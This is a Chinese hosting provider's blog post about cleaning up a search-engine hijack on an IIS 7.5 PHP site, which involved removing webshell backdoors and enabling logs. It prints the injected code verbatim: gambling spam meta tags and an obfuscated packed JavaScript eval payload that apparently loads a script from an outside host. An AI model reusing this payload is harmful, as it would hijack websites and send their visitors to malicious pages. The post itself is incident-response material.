iis7.5 php网站搜索引擎劫持处理案例

收到朋友微信求助说其中一个php网站被劫持,一直找不到原因,由于他是做网站建设的,服务器上的网站非常杂,存在漏洞被利用然后劫持也是很正常。接下来以这个案例说说网站劫持怎么修复

历史处理案例1:iis7.0全部网站被劫持处理过程分享,如何解决网站劫持!

历史处理案例2:百度 360 搜狗搜索引擎劫持攻击处理过程

百度收录的快照信息:

正常输入网址不会跳转,通过百度 360 搜狗等搜索引擎访问就会跳转到一个博彩网站,看来黑客有意躲避

登录ftp下载index.php存在异常代码如下:

<meta name="viewport" content="width=1250" /> 
<title>北京赛车pk10 PK10开奖直播 北京赛车pk10开奖结果 - pk10直播网</title>
 <meta name="keywords" content="北京赛车pk10开奖直播,北京赛车开奖记录,北京赛车pk10直播,北京赛车开奖直播,北京赛车pk10开奖网,pk10北京赛车网赚,北京赛车网赚,北京赛车带玩,北京赛车网赚群,北京赛车pk10技巧,北京赛车怎么玩赚钱,北京赛车 吉祥娱乐,北京赛车官网,北京赛车直播,北京赛车开奖" />
 <meta name="description" content="北京赛车,PK10开奖直播,提供【cx88cp.com】详尽研究分析总结,分享北京pk10开奖视频,pk10结果分析,北京赛车平台,pk10网上投注,北京pk10开奖直播,pk10开奖直播,北京pk10过往各开奖记录,pk10开奖结果,pk10网上开户,pk10开奖,专业的开奖视频北京pk10网"/>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\d\\e\\1\\m\\j\\8\\n\\0"]["\\6\\4\\9\\0\\8"](\'\\i\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\c\\7\\0\\8\\h\\0\\5\\f\\b\\q\\b\\2\\1\\4\\9\\3\\0\\7 \\2\\4\\1\\c\\7\\o\\0\\0\\3\\2\\p\\5\\5\\6\\6\\6\\a\\1\\3\\d\\b\\2\\r\\a\\1\\e\\j\\5\\1\\h\\1\\a\\f\\2\\7\\g\\i\\5\\2\\1\\4\\9\\3\\0\\g\');',28,28,'x74|x63|x73|x70|x72|x2f|x77|x22|x65|x69|x2e|x61|x3d|x64|x6f|x6a|x3e|x78|x3c|x6d|x79|window|x75|x6e|x68|x3a|x76|x38'.split('|'),0,{}))
</script>

朋友说删除后一天内又会挂回去,既然能修改页面内容必定存在后门或者有ftp权限等  查看ftp日志并没有收获,WebShellKill走一波发现有所收获扫出几个后门木马和小马 黑客也相当之狡猾把木马文件时间修改成几年前 可惜网站日志没有开启无法追查后门的由来。

网页木马包含asp大马 php大马 php一句话 php小马

为了能彻底处理掉这些后门开启网站访问日志,删除劫持代码静观几天待再次修改主页再分析日志,下为最近访问日志

通过把16号-18号的日志进行筛选查实存在10几个后门,最后把全部木马后门删除 修改网站目录权限再次进入观察

最后建议把网站日志开启,出现被黑可以通过日志进行分析人工排查 市面上能扫后门的工具相当之多比如WebShellKill 安全狗 云盾 云锁等等

本教程由树叶云出品 服务器运维官方网址http://IDC.NET欢迎大家多多关注本站 感谢大家的支持。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/199351.html<

(0)
运维的头像运维
上一篇2025-04-04 19:19
下一篇 2025-04-04 19:21

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注